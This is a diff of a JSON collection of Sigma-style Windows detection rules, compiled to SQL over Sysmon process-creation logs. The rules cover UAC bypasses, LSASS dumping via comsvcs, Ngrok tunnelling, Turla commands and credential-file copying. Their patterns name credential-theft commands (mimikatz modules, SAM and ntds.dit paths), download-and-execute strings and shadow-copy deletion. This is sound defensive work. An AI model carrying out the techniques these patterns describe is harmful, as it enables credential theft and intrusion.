"attack.privilege_escalation", - "attack.t1548.002" + "attack.discovery", + "attack.t1033", + "car.2016-03-001" ], "falsepositives": [ - "Unknown" + "Programs that use the same command line flags" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND ParentImage LIKE '%\\\\consent.exe' ESCAPE '\\' AND Image LIKE '%\\\\werfault.exe' ESCAPE '\\' AND IntegrityLevel IN ('High', 'System'))" + "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (Image LIKE '%\\\\SharpLdapWhoami.exe' ESCAPE '\\' OR OriginalFileName LIKE '%SharpLdapWhoami%' ESCAPE '\\' OR Product = 'SharpLdapWhoami' OR (CommandLine LIKE '% /method:ntlm' ESCAPE '\\' OR CommandLine LIKE '% /method:kerb' ESCAPE '\\' OR CommandLine LIKE '% /method:nego' ESCAPE '\\' OR CommandLine LIKE '% /m:nego' ESCAPE '\\' OR CommandLine LIKE '% /m:ntlm' ESCAPE '\\' OR CommandLine LIKE '% /m:kerb' ESCAPE '\\')))" ], - "filename": "proc_creation_win_uac_bypass_consent_comctl32.yml" + "filename": "proc_creation_win_hktl_sharpldapwhoami.yml" }, { - "title": "Potential Exploitation Attempt From Office Application", - "id": "868955d9-697e-45d4-a3da-360cefd7c216", + "title": "HackTool - SharpImpersonation Execution", + "id": "f89b08d0-77ad-4728-817b-9b16c5a69c7a", "status": "experimental", - "description": "Detects Office applications executing a child process that includes directory traversal patterns. This could be an attempt to exploit CVE-2022-30190 (MSDT RCE) or CVE-2021-40444 (MSHTML RCE)", - "author": "Christian Burkard (Nextron Systems), @SBousseaden (idea)", + "description": "Detects execution of the SharpImpersonation tool. 
Which can be used to manipulate tokens on a Windows computers remotely (PsExec/WmiExec) or interactively", + "author": "Sai Prashanth Pulisetti @pulisettis, Nasreddine Bencherchali (Nextron Systems)", "tags": [ - "attack.execution", - "attack.defense_evasion" + "attack.privilege_escalation", + "attack.defense_evasion", + "attack.t1134.001", + "attack.t1134.003" ], "falsepositives": [ "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND (ParentImage LIKE '%\\\\winword.exe' ESCAPE '\\' OR ParentImage LIKE '%\\\\excel.exe' ESCAPE '\\' OR ParentImage LIKE '%\\\\powerpnt.exe' ESCAPE '\\' OR ParentImage LIKE '%\\\\msaccess.exe' ESCAPE '\\' OR ParentImage LIKE '%\\\\mspub.exe' ESCAPE '\\' OR ParentImage LIKE '%\\\\eqnedt32.exe' ESCAPE '\\' OR ParentImage LIKE '%\\\\visio.exe' ESCAPE '\\') AND (CommandLine LIKE '%../../../..%' ESCAPE '\\' OR CommandLine LIKE '%..\\\\..\\\\..\\\\..%' ESCAPE '\\' OR CommandLine LIKE '%..//..//..//..%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (Image LIKE '%\\\\SharpImpersonation.exe' ESCAPE '\\' OR OriginalFileName = 'SharpImpersonation.exe' OR (CommandLine LIKE '% user:%' ESCAPE '\\' AND CommandLine LIKE '% binary:%' ESCAPE '\\') OR (CommandLine LIKE '% user:%' ESCAPE '\\' AND CommandLine LIKE '% shellcode:%' ESCAPE '\\') OR (CommandLine LIKE '% technique:CreateProcessAsUserW%' ESCAPE '\\' OR CommandLine LIKE '% technique:ImpersonateLoggedOnuser%' ESCAPE '\\')))" ], - "filename": "proc_creation_win_exploit_cve_2021_40444_office_directory_traversal.yml" + "filename": "proc_creation_win_hktl_sharp_impersonation.yml" }, { - "title": "Suspicious Calculator Usage", - "id": "737e618a-a410-49b5-bec3-9e55ff7fbc15", - "status": "test", - "description": "Detects suspicious use of 'calc.exe' with command line parameters or in a suspicious directory, which is likely caused by some PoC or 
detection evasion", - "author": "Florian Roth (Nextron Systems)", + "title": "Change Default File Association To Executable Via Assoc", + "id": "ae6f14e6-14de-45b0-9f44-c0986f50dc89", + "status": "experimental", + "description": "Detects when a program changes the default file association of any extension to an executable.\nWhen a file is opened, the default program used to open the file (also called the file association or handler) is checked. File association selections are stored in the Windows Registry and can be edited by users, administrators, or programs that have Registry access or by administrators using the built-in assoc utility. Applications can modify the file association for a given file extension to call an arbitrary program when a file with the given extension is opened.\n", + "author": "Nasreddine Bencherchali (Nextron Systems)", "tags": [ - "attack.defense_evasion", - "attack.t1036" + "attack.persistence", + "attack.t1546.001" ], "falsepositives": [ "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (CommandLine LIKE '%\\\\calc.exe %' ESCAPE '\\' OR (Image LIKE '%\\\\calc.exe' ESCAPE '\\' AND NOT ((Image LIKE 'C:\\\\Windows\\\\System32\\\\%' ESCAPE '\\' OR Image LIKE 'C:\\\\Windows\\\\SysWOW64\\\\%' ESCAPE '\\' OR Image LIKE 'C:\\\\Windows\\\\WinSxS\\\\%' ESCAPE '\\')))))" + "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND ((Image LIKE '%\\\\cmd.exe' ESCAPE '\\' OR OriginalFileName = 'Cmd.Exe') AND (CommandLine LIKE '%assoc %' ESCAPE '\\' AND CommandLine LIKE '%exefile%' ESCAPE '\\')) AND NOT (CommandLine LIKE '%.exe=exefile%' ESCAPE '\\'))" ], - "filename": "proc_creation_win_susp_calc.yml" + "filename": "proc_creation_win_cmd_assoc_tamper_exe_file_association.yml" }, { - "title": "Suspicious VBScript UN2452 Pattern", - "id": "20c3f09d-c53d-4e85-8b74-6aa50e2f1b61", + "title": "HTML Help HH.EXE Suspicious 
Child Process", + "id": "52cad028-0ff0-4854-8f67-d25dfcbc78b4", "status": "test", - "description": "Detects suspicious inline VBScript keywords as used by UNC2452", - "author": "Florian Roth (Nextron Systems)", + "description": "Detects a suspicious child process of a Microsoft HTML Help (HH.exe)", + "author": "Maxim Pavlunin, Nasreddine Bencherchali (Nextron Systems)", "tags": [ - "attack.persistence", - "attack.t1547.001" + "attack.defense_evasion", + "attack.execution", + "attack.initial_access", + "attack.t1047", + "attack.t1059.001", + "attack.t1059.003", + "attack.t1059.005", + "attack.t1059.007", + "attack.t1218", + "attack.t1218.001", + "attack.t1218.010", + "attack.t1218.011", + "attack.t1566", + "attack.t1566.001" ], "falsepositives": [ "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (CommandLine LIKE '%Execute%' ESCAPE '\\' AND CommandLine LIKE '%CreateObject%' ESCAPE '\\' AND CommandLine LIKE '%RegRead%' ESCAPE '\\' AND CommandLine LIKE '%window.close%' ESCAPE '\\' AND CommandLine LIKE '%\\\\Microsoft\\\\Windows\\\\CurrentVersion%' ESCAPE '\\') AND NOT (CommandLine LIKE '%\\\\Software\\\\Microsoft\\\\Windows\\\\CurrentVersion\\\\Run%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE (EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND ParentImage LIKE '%\\\\hh.exe' ESCAPE '\\' AND (Image LIKE '%\\\\CertReq.exe' ESCAPE '\\' OR Image LIKE '%\\\\CertUtil.exe' ESCAPE '\\' OR Image LIKE '%\\\\cmd.exe' ESCAPE '\\' OR Image LIKE '%\\\\cscript.exe' ESCAPE '\\' OR Image LIKE '%\\\\installutil.exe' ESCAPE '\\' OR Image LIKE '%\\\\MSbuild.exe' ESCAPE '\\' OR Image LIKE '%\\\\MSHTA.EXE' ESCAPE '\\' OR Image LIKE '%\\\\msiexec.exe' ESCAPE '\\' OR Image LIKE '%\\\\powershell.exe' ESCAPE '\\' OR Image LIKE '%\\\\pwsh.exe' ESCAPE '\\' OR Image LIKE '%\\\\regsvr32.exe' ESCAPE '\\' OR Image LIKE '%\\\\rundll32.exe' ESCAPE '\\' OR Image LIKE '%\\\\schtasks.exe' 
ESCAPE '\\' OR Image LIKE '%\\\\wmic.exe' ESCAPE '\\' OR Image LIKE '%\\\\wscript.exe' ESCAPE '\\'))" ], - "filename": "proc_creation_win_apt_unc2452_vbscript_pattern.yml" + "filename": "proc_creation_win_hh_html_help_susp_child_process.yml" }, { - "title": "Delete Important Scheduled Task", - "id": "dbc1f800-0fe0-4bc0-9c66-292c2abe3f78", + "title": "UAC Bypass Using IDiagnostic Profile", + "id": "4cbef972-f347-4170-b62a-8253f6168e6d", "status": "experimental", - "description": "Detects when adversaries stop services or processes by deleting their respective scheduled tasks in order to conduct data destructive activities", + "description": "Detects the \"IDiagnosticProfileUAC\" UAC bypass technique", "author": "Nasreddine Bencherchali (Nextron Systems)", "tags": [ - "attack.impact", - "attack.t1489" + "attack.execution", + "attack.defense_evasion", + "attack.privilege_escalation", + "attack.t1548.002" ], "falsepositives": [ - "Unlikely" + "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND Image LIKE '%\\\\schtasks.exe' ESCAPE '\\' AND CommandLine LIKE '%/delete%' ESCAPE '\\' AND CommandLine LIKE '%/tn%' ESCAPE '\\' AND (CommandLine LIKE '%\\\\Windows\\\\SystemRestore\\\\SR%' ESCAPE '\\' OR CommandLine LIKE '%\\\\Windows\\\\Windows Defender\\\\%' ESCAPE '\\' OR CommandLine LIKE '%\\\\Windows\\\\BitLocker%' ESCAPE '\\' OR CommandLine LIKE '%\\\\Windows\\\\WindowsBackup\\\\%' ESCAPE '\\' OR CommandLine LIKE '%\\\\Windows\\\\WindowsUpdate\\\\%' ESCAPE '\\' OR CommandLine LIKE '%\\\\Windows\\\\UpdateOrchestrator\\\\%' ESCAPE '\\' OR CommandLine LIKE '%\\\\Windows\\\\ExploitGuard%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE (EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND ParentImage LIKE '%\\\\DllHost.exe' ESCAPE '\\' AND ParentCommandLine LIKE '% /Processid:{12C21EA7-2EB8-4B55-9249-AC243DA8C666}%' ESCAPE '\\' AND IntegrityLevel IN ('High', 'System'))" ], - 
"filename": "proc_creation_win_schtasks_delete.yml" + "filename": "proc_creation_win_uac_bypass_idiagnostic_profile.yml" }, { - "title": "Process Dumping Via Comsvcs.DLL", - "id": "646ea171-dded-4578-8a4d-65e9822892e3", + "title": "Suspicious SYSTEM User Process Creation", + "id": "2617e7ed-adb7-40ba-b0f3-8f9945fe6c09", "status": "test", - "description": "Detects a process memory dump via \"comsvcs.dll\" using rundll32, covering multiple different techniques (ordinal, minidump function, etc.)", - "author": "Florian Roth (Nextron Systems), Modexp, Nasreddine Bencherchali (Nextron Systems)", - "tags": [ - "attack.defense_evasion", - "attack.credential_access", - "attack.t1036", - "attack.t1003.001", - "car.2013-05-009" - ], + "description": "Detects a suspicious process creation as SYSTEM user (suspicious program or command line parameter)", + "author": "Florian Roth (Nextron Systems), David ANDRE (additional keywords)", "falsepositives": [ - "Unlikely, because no one should dump the process memory in that way" + "Administrative activity", + "Scripts and administrative tools used in the monitored environment", + "Monitoring activity" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (((Image LIKE '%\\\\rundll32.exe' ESCAPE '\\' OR OriginalFileName = 'RUNDLL32.EXE' OR CommandLine LIKE '%rundll32%' ESCAPE '\\') AND (CommandLine LIKE '%comsvcs%' ESCAPE '\\' AND CommandLine LIKE '%full%' ESCAPE '\\' AND (CommandLine LIKE '%24 %' ESCAPE '\\' OR CommandLine LIKE '%#24%' ESCAPE '\\' OR CommandLine LIKE '%#+24%' ESCAPE '\\' OR CommandLine LIKE '%MiniDump%' ESCAPE '\\'))) OR CommandLine LIKE '%#-4294967272%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND ((IntegrityLevel = 'System' AND (User LIKE '%AUTHORI%' ESCAPE '\\' OR User LIKE '%AUTORI%' ESCAPE '\\')) AND ((Image LIKE '%\\\\calc.exe' ESCAPE '\\' OR Image LIKE 
'%\\\\wscript.exe' ESCAPE '\\' OR Image LIKE '%\\\\cscript.exe' ESCAPE '\\' OR Image LIKE '%\\\\hh.exe' ESCAPE '\\' OR Image LIKE '%\\\\mshta.exe' ESCAPE '\\' OR Image LIKE '%\\\\forfiles.exe' ESCAPE '\\' OR Image LIKE '%\\\\ping.exe' ESCAPE '\\') OR (CommandLine LIKE '% -NoP %' ESCAPE '\\' OR CommandLine LIKE '% -W Hidden %' ESCAPE '\\' OR CommandLine LIKE '% -decode %' ESCAPE '\\' OR CommandLine LIKE '% /decode %' ESCAPE '\\' OR CommandLine LIKE '% /urlcache %' ESCAPE '\\' OR CommandLine LIKE '% -urlcache %' ESCAPE '\\' OR CommandLine LIKE '% -e% JAB%' ESCAPE '\\' OR CommandLine LIKE '% -e% SUVYI%' ESCAPE '\\' OR CommandLine LIKE '% -e% SQBFAFgA%' ESCAPE '\\' OR CommandLine LIKE '% -e% aWV4I%' ESCAPE '\\' OR CommandLine LIKE '% -e% IAB%' ESCAPE '\\' OR CommandLine LIKE '% -e% PAA%' ESCAPE '\\' OR CommandLine LIKE '% -e% aQBlAHgA%' ESCAPE '\\' OR CommandLine LIKE '%vssadmin delete shadows%' ESCAPE '\\' OR CommandLine LIKE '%reg SAVE HKLM%' ESCAPE '\\' OR CommandLine LIKE '% -ma %' ESCAPE '\\' OR CommandLine LIKE '%Microsoft\\\\Windows\\\\CurrentVersion\\\\Run%' ESCAPE '\\' OR CommandLine LIKE '%.downloadstring(%' ESCAPE '\\' OR CommandLine LIKE '%.downloadfile(%' ESCAPE '\\' OR CommandLine LIKE '% /ticket:%' ESCAPE '\\' OR CommandLine LIKE '%dpapi::%' ESCAPE '\\' OR CommandLine LIKE '%event::clear%' ESCAPE '\\' OR CommandLine LIKE '%event::drop%' ESCAPE '\\' OR CommandLine LIKE '%id::modify%' ESCAPE '\\' OR CommandLine LIKE '%kerberos::%' ESCAPE '\\' OR CommandLine LIKE '%lsadump::%' ESCAPE '\\' OR CommandLine LIKE '%misc::%' ESCAPE '\\' OR CommandLine LIKE '%privilege::%' ESCAPE '\\' OR CommandLine LIKE '%rpc::%' ESCAPE '\\' OR CommandLine LIKE '%sekurlsa::%' ESCAPE '\\' OR CommandLine LIKE '%sid::%' ESCAPE '\\' OR CommandLine LIKE '%token::%' ESCAPE '\\' OR CommandLine LIKE '%vault::cred%' ESCAPE '\\' OR CommandLine LIKE '%vault::list%' ESCAPE '\\' OR CommandLine LIKE '% p::d %' ESCAPE '\\' OR CommandLine LIKE '%;iex(%' ESCAPE '\\' OR CommandLine LIKE 
'%MiniDump%' ESCAPE '\\' OR CommandLine LIKE '%net user %' ESCAPE '\\'))) AND NOT ((CommandLine = 'ping 127.0.0.1 -n 5') OR (Image LIKE '%\\\\PING.EXE' ESCAPE '\\' AND ParentCommandLine LIKE '%\\\\DismFoDInstall.cmd%' ESCAPE '\\') OR (ParentImage LIKE 'C:\\\\Packages\\\\Plugins\\\\Microsoft.GuestConfiguration.ConfigurationforWindows\\\\%' ESCAPE '\\') OR (ParentImage LIKE 'C:\\\\Program Files (x86)\\\\Java\\\\%' ESCAPE '\\' AND ParentImage LIKE '%\\\\bin\\\\javaws.exe' ESCAPE '\\' AND Image LIKE 'C:\\\\Program Files (x86)\\\\Java\\\\%' ESCAPE '\\' AND Image LIKE '%\\\\bin\\\\jp2launcher.exe' ESCAPE '\\' AND CommandLine LIKE '% -ma %' ESCAPE '\\')))" ], - "filename": "proc_creation_win_rundll32_process_dump_via_comsvcs.yml" + "filename": "proc_creation_win_susp_system_user_anomaly.yml" }, { - "title": "Execution Of Non-Existing File", - "id": "71158e3f-df67-472b-930e-7d287acaa3e1", - "status": "experimental", - "description": "Checks whether the image specified in a process creation event is not a full, absolute path (caused by process ghosting or other unorthodox methods to start a process)", - "author": "Max Altgelt (Nextron Systems)", + "title": "Execution via Diskshadow.exe", + "id": "0c2f8629-7129-4a8a-9897-7e0768f13ff2", + "status": "test", + "description": "Detects using Diskshadow.exe to execute arbitrary code in text file", + "author": "Ivan Dyachkov, oscd.community", "tags": [ - "attack.defense_evasion" + "attack.execution", + "attack.t1218" ], "falsepositives": [ - "Unknown" + "False postitve can be if administrators use diskshadow tool in their infrastructure as a main backup tool with scripts." 
], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND NOT (Image LIKE '%\\\\%' ESCAPE '\\') AND NOT ((Image = '') OR (Image IN ('-', '')) OR (Image IN ('System', 'Registry', 'MemCompression', 'vmmem') OR CommandLine IN ('Registry', 'MemCompression', 'vmmem'))))" + "SELECT * FROM logs WHERE (EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND Image LIKE '%\\\\diskshadow.exe' ESCAPE '\\' AND (CommandLine LIKE '%/s%' ESCAPE '\\' OR CommandLine LIKE '%-s%' ESCAPE '\\'))" ], - "filename": "proc_creation_win_susp_image_missing.yml" + "filename": "proc_creation_win_lolbin_diskshadow.yml" }, { - "title": "HH.EXE Execution", - "id": "68c8acb4-1b60-4890-8e82-3ddf7a6dba84", + "title": "PUA - Ngrok Execution", + "id": "ee37eb7c-a4e7-4cd5-8fa4-efa27f1c3f31", "status": "test", - "description": "Detects the usage of \"hh.exe\" executing recently modified .chm files.", - "author": "E.M. Anhaus (originally from Atomic Blue Detections, Dan Beavin), oscd.community", + "description": "Detects the use of Ngrok, a utility used for port forwarding and tunneling, often used by threat actors to make local protected services publicly available.\nInvolved domains are bin.equinox.io for download and *.ngrok.io for connections.\n", + "author": "Florian Roth (Nextron Systems)", "tags": [ - "attack.defense_evasion", - "attack.t1218.001" + "attack.command_and_control", + "attack.t1572" ], "falsepositives": [ - "Unlikely" + "Another tool that uses the command line switches of Ngrok", + "Ngrok http 3978 (https://docs.microsoft.com/en-us/azure/bot-service/bot-service-debug-channel-ngrok?view=azure-bot-service-4.0)" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND Image LIKE '%\\\\hh.exe' ESCAPE '\\' AND CommandLine LIKE '%.chm%' ESCAPE '\\')" + "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 
'Microsoft-Windows-Sysmon/Operational') AND ((CommandLine LIKE '% tcp 139%' ESCAPE '\\' OR CommandLine LIKE '% tcp 445%' ESCAPE '\\' OR CommandLine LIKE '% tcp 3389%' ESCAPE '\\' OR CommandLine LIKE '% tcp 5985%' ESCAPE '\\' OR CommandLine LIKE '% tcp 5986%' ESCAPE '\\') OR (CommandLine LIKE '% start %' ESCAPE '\\' AND CommandLine LIKE '%--all%' ESCAPE '\\' AND CommandLine LIKE '%--config%' ESCAPE '\\' AND CommandLine LIKE '%.yml%' ESCAPE '\\') OR (Image LIKE '%ngrok.exe' ESCAPE '\\' AND (CommandLine LIKE '% tcp %' ESCAPE '\\' OR CommandLine LIKE '% http %' ESCAPE '\\' OR CommandLine LIKE '% authtoken %' ESCAPE '\\')) OR (CommandLine LIKE '%.exe authtoken %' ESCAPE '\\' OR CommandLine LIKE '%.exe start --all%' ESCAPE '\\')))" ], - "filename": "proc_creation_win_hh_chm_execution.yml" + "filename": "proc_creation_win_pua_ngrok.yml" }, { - "title": "Non-privileged Usage of Reg or Powershell", - "id": "8f02c935-effe-45b3-8fc9-ef8696a9e41d", + "title": "Suspicious Control Panel DLL Load", + "id": "d7eb979b-c2b5-4a6f-a3a7-c87ce6763819", "status": "test", - "description": "Search for usage of reg or Powershell by non-privileged users to modify service configuration in registry", - "author": "Teymur Kheirkhabarov (idea), Ryan Plas (rule), oscd.community", + "description": "Detects suspicious Rundll32 execution from control.exe as used by Equation Group and Exploit Kits", + "author": "Florian Roth (Nextron Systems)", "tags": [ "attack.defense_evasion", - "attack.t1112" + "attack.t1218.011" ], "falsepositives": [ "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND ((CommandLine LIKE '%reg %' ESCAPE '\\' AND CommandLine LIKE '%add%' ESCAPE '\\') OR (CommandLine LIKE '%powershell%' ESCAPE '\\' OR CommandLine LIKE '%set-itemproperty%' ESCAPE '\\' OR CommandLine LIKE '% sp %' ESCAPE '\\' OR CommandLine LIKE '%new-itemproperty%' ESCAPE '\\')) AND (IntegrityLevel = 'Medium' AND CommandLine 
LIKE '%ControlSet%' ESCAPE '\\' AND CommandLine LIKE '%Services%' ESCAPE '\\' AND (CommandLine LIKE '%ImagePath%' ESCAPE '\\' OR CommandLine LIKE '%FailureCommand%' ESCAPE '\\' OR CommandLine LIKE '%ServiceDLL%' ESCAPE '\\')))" + "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (ParentImage LIKE '%\\\\System32\\\\control.exe' ESCAPE '\\' AND (Image LIKE '%\\\\rundll32.exe' ESCAPE '\\' OR OriginalFileName = 'RUNDLL32.EXE')) AND NOT (CommandLine LIKE '%Shell32.dll%' ESCAPE '\\'))" ], - "filename": "proc_creation_win_susp_non_priv_reg_or_ps.yml" + "filename": "proc_creation_win_rundll32_susp_control_dll_load.yml" }, { - "title": "Suspicious Regsvr32 HTTP IP Pattern", - "id": "2dd2c217-bf68-437a-b57c-fe9fd01d5de8", + "title": "Delete Important Scheduled Task", + "id": "dbc1f800-0fe0-4bc0-9c66-292c2abe3f78", "status": "experimental", - "description": "Detects a certain command line flag combination used by regsvr32 when used to download and register a DLL from a remote address which uses HTTP (not HTTPS) and a IP address and not FQDN", - "author": "Florian Roth (Nextron Systems)", + "description": "Detects when adversaries stop services or processes by deleting their respective scheduled tasks in order to conduct data destructive activities", + "author": "Nasreddine Bencherchali (Nextron Systems)", "tags": [ - "attack.defense_evasion", - "attack.t1218.010" + "attack.impact", + "attack.t1489" ], "falsepositives": [ - "FQDNs that start with a number" + "Unlikely" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND CommandLine LIKE '% /s%' ESCAPE '\\' AND CommandLine LIKE '% /u%' ESCAPE '\\' AND (CommandLine LIKE '% /i:http://1%' ESCAPE '\\' OR CommandLine LIKE '% /i:http://2%' ESCAPE '\\' OR CommandLine LIKE '% /i:http://3%' ESCAPE '\\' OR CommandLine LIKE '% /i:http://4%' ESCAPE '\\' OR CommandLine LIKE '% /i:http://5%' ESCAPE '\\' OR 
CommandLine LIKE '% /i:http://6%' ESCAPE '\\' OR CommandLine LIKE '% /i:http://7%' ESCAPE '\\' OR CommandLine LIKE '% /i:http://8%' ESCAPE '\\' OR CommandLine LIKE '% /i:http://9%' ESCAPE '\\' OR CommandLine LIKE '% /i:https://1%' ESCAPE '\\' OR CommandLine LIKE '% /i:https://2%' ESCAPE '\\' OR CommandLine LIKE '% /i:https://3%' ESCAPE '\\' OR CommandLine LIKE '% /i:https://4%' ESCAPE '\\' OR CommandLine LIKE '% /i:https://5%' ESCAPE '\\' OR CommandLine LIKE '% /i:https://6%' ESCAPE '\\' OR CommandLine LIKE '% /i:https://7%' ESCAPE '\\' OR CommandLine LIKE '% /i:https://8%' ESCAPE '\\' OR CommandLine LIKE '% /i:https://9%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE (EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND Image LIKE '%\\\\schtasks.exe' ESCAPE '\\' AND CommandLine LIKE '%/delete%' ESCAPE '\\' AND CommandLine LIKE '%/tn%' ESCAPE '\\' AND (CommandLine LIKE '%\\\\Windows\\\\SystemRestore\\\\SR%' ESCAPE '\\' OR CommandLine LIKE '%\\\\Windows\\\\Windows Defender\\\\%' ESCAPE '\\' OR CommandLine LIKE '%\\\\Windows\\\\BitLocker%' ESCAPE '\\' OR CommandLine LIKE '%\\\\Windows\\\\WindowsBackup\\\\%' ESCAPE '\\' OR CommandLine LIKE '%\\\\Windows\\\\WindowsUpdate\\\\%' ESCAPE '\\' OR CommandLine LIKE '%\\\\Windows\\\\UpdateOrchestrator\\\\%' ESCAPE '\\' OR CommandLine LIKE '%\\\\Windows\\\\ExploitGuard%' ESCAPE '\\'))" ], - "filename": "proc_creation_win_regsvr32_http_pattern.yml" + "filename": "proc_creation_win_schtasks_delete.yml" }, { - "title": "Potential Unquoted Service Path Reconnaissance Via Wmic.EXE", - "id": "68bcd73b-37ef-49cb-95fc-edc809730be6", - "status": "experimental", - "description": "Detects known WMI recon method to look for unquoted service paths using wmic. 
Often used by pentester and attacker enumeration scripts", - "author": "Nasreddine Bencherchali (Nextron Systems)", + "title": "Turla Group Commands May 2020", + "id": "9e2e51c5-c699-4794-ba5a-29f5da40ac0c", + "status": "test", + "description": "Detects commands used by Turla group as reported by ESET in May 2020", + "author": "Florian Roth (Nextron Systems)", "tags": [ + "attack.g0010", "attack.execution", - "attack.t1047" + "attack.t1059.001", + "attack.t1053.005", + "attack.t1027" ], "falsepositives": [ "Unknown" ], - "level": "high", + "level": "critical", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (OriginalFileName = 'wmic.exe' OR Image LIKE '%\\\\WMIC.exe' ESCAPE '\\') AND (CommandLine LIKE '% service get %' ESCAPE '\\' AND CommandLine LIKE '%name,displayname,pathname,startmode%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND ((CommandLine LIKE '%tracert -h 10 yahoo.com%' ESCAPE '\\' OR CommandLine LIKE '%.WSqmCons))|iex;%' ESCAPE '\\' OR CommandLine LIKE '%Fr`omBa`se6`4Str`ing%' ESCAPE '\\') OR (CommandLine LIKE '%net use https://docs.live.net%' ESCAPE '\\' AND CommandLine LIKE '%@aol.co.uk%' ESCAPE '\\')))" ], - "filename": "proc_creation_win_wmic_recon_unquoted_service_search.yml" + "filename": "proc_creation_win_apt_turla_comrat_may20.yml" }, { - "title": "Sysmon Driver Unloaded Via Fltmc.EXE", - "id": "4d7cda18-1b12-4e52-b45c-d28653210df8", - "status": "test", - "description": "Detects possible Sysmon filter driver unloaded via fltmc.exe", - "author": "Kirill Kiryanov, oscd.community", + "title": "Rundll32 UNC Path Execution", + "id": "5cdb711b-5740-4fb2-ba88-f7945027afac", + "status": "experimental", + "description": "Detects rundll32 execution where the DLL is located on a remote location (share)", + "author": "Nasreddine Bencherchali (Nextron Systems)", "tags": [ "attack.defense_evasion", - "attack.t1070", - 
"attack.t1562", - "attack.t1562.002" + "attack.execution", + "attack.t1021.002", + "attack.t1218.011" ], "falsepositives": [ "Unlikely" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (Image LIKE '%\\\\fltMC.exe' ESCAPE '\\' OR OriginalFileName = 'fltMC.exe') AND (CommandLine LIKE '%unload%' ESCAPE '\\' AND CommandLine LIKE '%sysmon%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (Image LIKE '%\\\\rundll32.exe' ESCAPE '\\' OR OriginalFileName = 'RUNDLL32.EXE' OR CommandLine LIKE '%rundll32%' ESCAPE '\\') AND CommandLine LIKE '% \\\\\\\\\\*' ESCAPE '\\')" ], - "filename": "proc_creation_win_fltmc_unload_driver_sysmon.yml" + "filename": "proc_creation_win_rundll32_unc_path.yml" }, { - "title": "Regsvr32 Flags Anomaly", - "id": "b236190c-1c61-41e9-84b3-3fe03f6d76b0", + "title": "Copying Sensitive Files with Credential Data", + "id": "e7be6119-fc37-43f0-ad4f-1f3f99be2f9f", "status": "test", - "description": "Detects a flag anomaly in which regsvr32.exe uses a /i flag without using a /n flag at the same time", - "author": "Florian Roth (Nextron Systems)", + "description": "Files with well-known filenames (sensitive files with credential data) copying", + "author": "Teymur Kheirkhabarov, Daniil Yugoslavskiy, oscd.community", "tags": [ - "attack.defense_evasion", - "attack.t1218.010" + "attack.credential_access", + "attack.t1003.002", + "attack.t1003.003", + "car.2013-07-001", + "attack.s0404" ], "falsepositives": [ - "Unknown" + "Copying sensitive files for legitimate use (eg. 
backup) or forensic investigation by legitimate incident responder or forensic invetigator" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (Image LIKE '%\\\\regsvr32.exe' ESCAPE '\\' AND CommandLine LIKE '% /i:%' ESCAPE '\\') AND NOT (CommandLine LIKE '% /n %' ESCAPE '\\'))" + "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (((Image LIKE '%\\\\esentutl.exe' ESCAPE '\\' OR OriginalFileName LIKE '\\\\esentutl.exe' ESCAPE '\\') AND (CommandLine LIKE '%vss%' ESCAPE '\\' OR CommandLine LIKE '% /m %' ESCAPE '\\' OR CommandLine LIKE '% /y %' ESCAPE '\\')) OR (CommandLine LIKE '%\\\\windows\\\\ntds\\\\ntds.dit%' ESCAPE '\\' OR CommandLine LIKE '%\\\\config\\\\sam%' ESCAPE '\\' OR CommandLine LIKE '%\\\\config\\\\security%' ESCAPE '\\' OR CommandLine LIKE '%\\\\config\\\\system %' ESCAPE '\\' OR CommandLine LIKE '%\\\\repair\\\\sam%' ESCAPE 